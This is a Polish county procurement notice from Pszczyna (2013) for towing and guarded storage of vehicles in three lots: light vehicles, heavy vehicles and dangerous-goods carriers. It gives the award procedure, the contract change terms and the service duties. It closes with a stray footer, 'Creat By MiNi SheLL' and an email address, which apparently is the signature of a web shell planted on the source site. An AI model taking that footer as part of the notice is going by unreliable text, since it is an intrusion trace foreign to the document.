<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany do umowy możliwe są jedynie w trybie art. 144 ustawy PZP. Uzgodnienia w tym zakresie wymagają dla swej ważności zatwierdzenia przez Zamawiającego, a zmiana umowy może nastąpić jedynie na piśmie w formie aneksu pod rygorem nieważności.
2.	Zamawiający dopuszcza możliwość zmiany umowy w następujących okolicznościach:
a.	rezygnacji Zamawiającego z wykonania części usługi z jednoczesnym ograniczeniem (obniżeniem) wynagrodzenia wykonawcy,
b.	ustawowej zmiany przepisów podatkowych, np. zmiany stawki podatku VAT
c.	działania siły wyższej, zdarzeń losowych niezależnych od stron umowy
d.	poprawy oczywistej omyłki.
e.	pisemnego uzgodnienia pomiędzy Stronami dotyczącego skróceniu terminu zakończenia realizacji umowy;
f.	zmiana nazw, siedziby stron umowy, numerów kont bankowych, innych danych identyfikacyjnych;
g.	zmiana lub wprowadzenie podwykonawcy, zmiana lub wprowadzenie osoby/ osób uczestniczących w wykonywaniu zamówienia  (realizujących zamówienie) pod warunkiem odpowiedniego zgłoszenia i po akceptacji przez Zamawiającego;
h.	zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia,
i.	wynikną rozbieżności lub niejasności w umowie, których nie można usunąć 
w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności 
i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony umowy.
3.	Wszelkie zmiany lub uzupełnienia niniejszej Umowy wymagają zgody obu Stron wyrażonej na piśmie w drodze aneksu, pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przetargi.powiat.pszczyna.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Pszczynie,parter pok. 5Wydział Zamówień Publicznych lub przesyłką pocztową (poleconą) na adres :
Starostwo Powiatowe w Pszczynie, ul. 3 Maja 10, 43-200 Pszczyna.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.02.2013 godzina 10:00, miejsce: Starostwo Powiatowe w Pszczynie, I piętro pok. 35 Sekretariat lub przesyłką pocztową (poleconą) na adres:Starostwo Powiatowe w Pszczynie, ul. 3 Maja 10, 43-200 Pszczyna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> CZĘŚĆ A - pojazdy do 3,5 t:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ A - pojazdy do 3,5 t:
a.	Świadczenie kompleksowych usług w zakresie usuwania pojazdów 
o dopuszczalnej masie całkowitej nieprzekraczającej 3,5t z dróg położonych na obszarze powiatu pszczyńskiego i całodobowe przechowywanie ich na parkingu strzeżonym usytuowanym na terenie powiatu pszczyńskiego, w trybie i na zasadach określonych w art. 130a ustawy z dnia 20 czerwca 1997r. Prawo 
o ruchu drogowym (Dz.U. z 2012r., poz.1137 z późn.zm.)
b.	  Usuwanie i przechowywanie pojazdów odbywa się na podstawie dyspozycji wydanej przez funkcjonariusza wymienionego w art.130a, ust. 4 ustawy Prawo 
o ruchu drogowym.
c.	 Zakres podstawowych czynności wykonywanych podczas realizacji usługi obejmuje:
c.1. zapewnienie całodobowej łączności telefonicznej,
c.2. przyjęcie zlecenia przyjazdu pojazdu holującego,
c.3. dojazd do miejsca zdarzenia w możliwie najkrótszym czasie, nie dłużej niż do
      45 minut od przyjęcia zlecenia 
c.4. przygotowanie pojazdu (i jego części jeżeli zostały oddzielone od pojazdu) do
       załadunku i holowania, 
c.5. załadunek pojazdu i jego części, jeżeli zostały oddzielone od pojazdu,
c.6. uporządkowanie miejsca zdarzenia,
c.7. dojazd z pojazdem transportowanym lub holowanym na parking strzeżony,
c.8. rozładunek i zaparkowanie pojazdu na parkingu strzeżonym,
c.9. zabezpieczenie przechowywanego pojazdu przed zniszczeniem podczas
      przechowywania,
c.10. sprawowanie całodobowego nadzoru nad przyjętym pojazdem do momentu
       jego odbioru. 
c.11. przedstawianie w Wydziale Komunikacji i Transportu Starostwa
       Powiatowego w Pszczynie do 5 dnia każdego miesiąca, wykazu pojazdów
       usuniętych w miesiącu poprzednim z kopią dyspozycji usunięcia, daty i
       godziny umieszczenia na parkingu, marki i typu pojazdu, jego numeru
       rejestracyjnego i numeru nadwozia/podwozia/ramy,
c.12. informowanie Starosty Pszczyńskiego i podmiotu, który wydał dyspozycję
       usunięcia pojazdu o fakcie nieodebrania pojazdu z parkingu po upływie 3
       miesięcy od momentu jego usunięcia, jednak nie później niż 3-go dnia od
       upływu tego terminu.
d.	  Ilości pojazdów przewidywanych do usuwania i przechowywania określono 
w załączniku nr 1 do SIWZ Zakres usługi.
e.	  W czasie trwania umowy mogą wystąpić zmiany w liczbie usuniętych pojazdów. Ich liczba w pełni uzależniona jest od liczby wydanych dyspozycji usunięcia wydanych przez funkcjonariuszy wymienionych w art.130a, ust. 4 ustawy Prawo o ruchu drogowym.
Dla poszczególnych części zamówienia przyjmuje się:

CZĘŚĆ A - pojazdy do 3,5 t:
Świadczenie kompleksowych usług w zakresie usuwania pojazdów o dopuszczalnej masie całkowitej nieprzekraczającej 3,5t z dróg położonych na obszarze powiatu pszczyńskiego i całodobowe przechowywanie ich na parkingu strzeżonym usytuowanym na terenie powiatu pszczyńskiego, w trybie i na zasadach określonych w art. 130a ustawy z dnia 20 czerwca 1997r. Prawo o ruchu drogowym (Dz.U. z 2012r., poz.1137 z późn.zm.)

CZĘŚĆ A Tabela 1 - usuwanie pojazdów
L.p.	Rodzaj pojazdu	Przewidywana ilość pojazdów w okresie 3-ch lat
(szt).Rowery i motorowery	6  szt.;	Motocykle 6 szt. Pojazdy o dmc nieprzekraczającej 3,5t	51 sztuk..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.81.10-9, 98.35.11.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.04.2016.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> CZĘŚĆ B - pojazdy powyżej 3,5 t:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ B - pojazdy powyżej 3,5 t:

a.	  Przedmiotem zamówienia jest usuwanie pojazdów o dopuszczalnej masie całkowitej powyżej 3,5t z dróg położonych na obszarze powiatu pszczyńskiego 
i całodobowe przechowywanie ich na parkingu strzeżonym usytuowanym na terenie powiatu pszczyńskiego, w trybie i na zasadach określonych w art. 130a ustawy z dnia 20 czerwca 1997r. Prawo o ruchu drogowym (Dz.U. z 2012r., poz.1137).
b.	  Usuwanie i przechowywanie pojazdów odbywa się na podstawie dyspozycji wydanej przez funkcjonariusza wymienionego w art.130a, ust. 4 ustawy Prawo 
o ruchu drogowym.
c.	  Zakres podstawowych czynności wykonywanych podczas realizacji usługi obejmuje:
c.1. zapewnienie całodobowej łączności telefonicznej,
c.2. przyjęcie zlecenia przyjazdu pojazdu holującego,
c.3. dojazd do miejsca zdarzenia w możliwie najkrótszym czasie, nie dłużej niż do
      45 minut od przyjęcia zlecenia, 
c.4. przygotowanie pojazdu (i jego części jeżeli zostały oddzielone od pojazdu) do
       załadunku i holowania, 
c.5. załadunek pojazdu i jego części, jeżeli zostały oddzielone od pojazdu,
c.6. uporządkowanie miejsca zdarzenia,
c.7. dojazd z pojazdem transportowanym lub holowanym na parking strzeżony,
c.8. rozładunek i zaparkowanie pojazdu na parkingu strzeżonym,
c.9. zabezpieczenie przechowywanego pojazdu przed zniszczeniem podczas
      przechowywania,
c.10. sprawowanie całodobowego nadzoru nad przyjętym pojazdem do momentu
       jego odbioru. 
c.11. przedstawianie w Wydziale Komunikacji i Transportu Starostwa
       Powiatowego w Pszczynie do 5 dnia każdego miesiąca, wykazu pojazdów
       usuniętych w miesiącu poprzednim z kopią dyspozycji usunięcia, daty i
       godziny umieszczenia na parkingu, marki i typu pojazdu, jego numeru
       rejestracyjnego i numeru nadwozia podwozia ramy,
c.12. informowanie Starosty Pszczyńskiego i podmiotu, który wydał dyspozycję
       usunięcia pojazdu o fakcie nieodebrania pojazdu z parkingu po upływie 3
       miesięcy od momentu jego usunięcia, jednak nie później niż 3-go dnia od
       upływu tego terminu.
d.	  Ilości pojazdów przewidywanych do usuwania i przechowywania określono 
w załączniku nr 1 do SIWZ Zakres usługi.
e.	W czasie trwania umowy mogą wystąpić zmiany w liczbie usuniętych pojazdów. Ich liczba w pełni uzależniona jest od liczby wydanych dyspozycji usunięcia wydanych przez funkcjonariuszy wymienionych w art.130a, ust. 4 ustawy Prawo o ruchu drogowym.
CZĘŚĆ B - pojazdy powyżej 3,5 t:
Świadczenie kompleksowych usług w zakresie usuwania pojazdów o dopuszczalnej masie całkowitej powyżej 3,5t z dróg położonych na obszarze powiatu pszczyńskiego i całodobowe przechowywanie ich na parkingu strzeżonym usytuowanym na terenie powiatu pszczyńskiego, w trybie i na zasadach określonych w art. 130a ustawy z dnia 20 czerwca 1997r. Prawo o ruchu drogowym (Dz.U. z 2012r., poz.1137 z późn.zm.).

CZĘŚĆ B Tabela 1 - usuwanie pojazdów
L.p.	Rodzaj pojazdu	Przewidywana ilość pojazdów w okresie 3-ch lat
(szt)
Pojazdy o dmc od  3,5 t do 7,5 t (9 sztuk); Pojazdy o dmc 7,5 t do 16,0 t	(9sztuk);Pojazdy o dmc powyżej 16,0 t (9sztuk)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.81.10-9, 98.35.11.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.04.2016.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> CZĘŚĆ C - pojazdy przewożące materiały niebezpieczne:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ C - pojazdy przewożące materiały niebezpieczne:
a.	  Przedmiotem zamówienia jest usuwanie pojazdów przewożących materiały niebezpieczne  z dróg położonych na obszarze powiatu pszczyńskiego 
i całodobowe przechowywanie ich na parkingu strzeżonym, w trybie i na zasadach określonych w art. 130a ustawy z dnia 20 czerwca 1997r. Prawo 
o ruchu drogowym (Dz.U. z 2012r., poz.1137).
b.	  Usuwanie i przechowywanie pojazdów odbywa się na podstawie dyspozycji wydanej przez funkcjonariusza wymienionego w art.130a, ust. 4 ustawy Prawo 
o ruchu drogowym
c.	  Zakres podstawowych czynności wykonywanych podczas realizacji usługi obejmuje:
c.1. zapewnienie całodobowej łączności telefonicznej,
c.2. przyjęcie zlecenia przyjazdu pojazdu holującego,
c.3. dojazd do miejsca zdarzenia w możliwie najkrótszym czasie, nie dłużej niż do
      45 minut od przyjęcia zlecenia, 
c.4. przygotowanie pojazdu (i jego części jeżeli zostały oddzielone od pojazdu) do
       załadunku i holowania, 
c.5. załadunek pojazdu i jego części, jeżeli zostały oddzielone od pojazdu,
c.6. uporządkowanie miejsca zdarzenia,
c.7. dojazd z pojazdem transportowanym lub holowanym na parking strzeżony,
c.8. rozładunek i zaparkowanie pojazdu na parkingu strzeżonym,
c.9. zabezpieczenie przechowywanego pojazdu przed zniszczeniem podczas
      przechowywania,
c.10. sprawowanie całodobowego nadzoru nad przyjętym pojazdem do momentu
       jego odbioru. 
c.11. przedstawianie w Wydziale Komunikacji i Transportu Starostwa
       Powiatowego w Pszczynie do 5 dnia każdego miesiąca, wykazu pojazdów
       usuniętych w miesiącu poprzednim z kopią dyspozycji usunięcia, daty i
       godziny umieszczenia na parkingu, marki i typu pojazdu, jego numeru
       rejestracyjnego i numeru nadwozia/podwozia/ramy,
c.12. informowanie Starosty Pszczyńskiego i podmiotu, który wydał dyspozycję
       usunięcia pojazdu o fakcie nieodebrania pojazdu z parkingu po upływie 3
       miesięcy od momentu jego usunięcia, jednak nie później niż 3-go dnia od
       upływu tego terminu.
d.	  Ilości pojazdów przewidywanych do usuwania i przechowywania określono 
w załączniku nr 1 do SIWZ Zakres ustawy.
e.	W czasie trwania umowy mogą wystąpić zmiany w liczbie usuniętych pojazdów. Ich liczba w pełni uzależniona jest od liczby wydanych dyspozycji usunięcia wydanych przez funkcjonariuszy wymienionych w art.130a, ust. 4 ustawy Prawo o ruchu drogowym.
CZĘŚĆ C - pojazdy przewożące materiały niebezpieczne, 
Świadczenie kompleksowych usług w zakresie usuwania pojazdów przewożących materiały niebezpieczne z dróg położonych na obszarze powiatu pszczyńskiego i całodobowe przechowywanie ich na parkingu strzeżonym, w trybie i na zasadach określonych w art. 130a ustawy z dnia 20 czerwca 1997r. Prawo o ruchu drogowym (Dz.U. z 2012r., poz.1137 z późn.zm.).

CZĘŚĆ C Tabela 1 - usuwanie pojazdów
L.p.	Rodzaj pojazdu	Przewidywana ilość pojazdów w okresie 3-ch lat
(szt)
Pojazdy przewożące materiały niebezpieczne	6 sztuk..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.81.10-9, 98.35.11.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.04.2016.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com